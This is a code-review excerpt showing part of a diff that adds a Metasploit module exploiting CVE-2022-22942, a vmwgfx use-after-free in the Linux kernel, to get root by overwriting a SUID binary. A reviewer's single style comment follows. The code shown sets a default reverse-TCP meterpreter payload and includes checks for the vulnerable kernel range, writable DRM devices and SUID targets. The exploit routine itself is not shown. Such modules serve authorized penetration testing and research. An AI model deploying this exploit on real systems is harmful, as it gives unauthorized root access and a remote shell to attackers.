modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb

```diff
@@ -0,0 +1,178 @@
+          as the fd table slot was already populated via the previous call to
+          fd_install(). This leaves userland with a valid fd table entry pointing to
+          a free'd 'file' object.
+
+          We use this bug to overwrite a SUID binary with our payload and gain root.
+          Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.
+
+          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Mathias Krause' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],
+          [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],
+          [ 'CVE', '2022-22942' ]
+        ],
+        'DisclosureDate' => '2022-01-28',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'PrependFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'Reliability' => [REPEATABLE_SESSION],
+          # seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = kernel_release
+    unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&
+           Rex::Version.new(release) < Rex::Version.new('5.17-rc1')
+      return CheckCode::Safe("Kernel version #{release} is not vulnerable")
+    end
+
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    @driver = nil
+
+    if writable?('/dev/dri/card0') # ubuntu
+      @driver = '/dev/dri/card0'
+    elsif writable?('/dev/dri/renderD128') # debian
+      @driver = '/dev/dri/renderD128'
+    else
+      return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128')
+    end
+    vprint_good("#{@driver} found writable")
+
+    @suid_target = nil
+    if setuid?('/bin/chfn') # ubuntu
+      @suid_target = '/bin/chfn'
+    elsif writable?('/bin/chage') # RHEL/Centos
+      @suid_target = '/bin/chage'
+    else
+      return CheckCode::Safe('Unable to write to /bin/chfn or /bin/chage')
+    end
+    vprint_good("#{@suid_target} suid binary found")
+
+    vmwgfx = cmd_exec('modinfo vmwgfx | grep version')
+    if vmwgfx.include? 'version'
```

Comment:
As you're only checking that the `vmwgfx` module is installed, not using the version, you could use `kernel_modules` instead.

```suggestion
    if kernel_modules.include?('vmwgfx')
```